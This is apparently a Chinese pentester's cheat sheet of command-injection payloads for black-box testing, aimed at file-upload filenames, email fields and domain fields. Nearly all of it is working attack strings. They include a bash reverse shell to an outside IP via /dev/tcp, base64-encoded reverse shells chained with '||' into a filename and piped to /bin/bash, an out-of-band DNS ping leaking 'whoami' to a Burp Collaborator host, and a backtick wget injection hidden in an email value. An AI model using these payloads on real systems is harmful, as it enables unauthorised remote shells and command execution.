黑盒常见的几个点
1.文件上传 filename处这些
2.邮箱
3.存在域名的地方
典型使用的payload
path拼接
1.常规拼接思路
| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net |
2.直接反弹shell方法,编码的反弹shell思路
| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |
tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash
3.端口监听
tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash #
如果是nodejs的话可以使用这种思路去处理
4.命令执行的操作
`sleep 5`
5.利用``进行拼接思路
payload:”email”: `wget%20xxx.ceye.io/xxxx`@qq.com”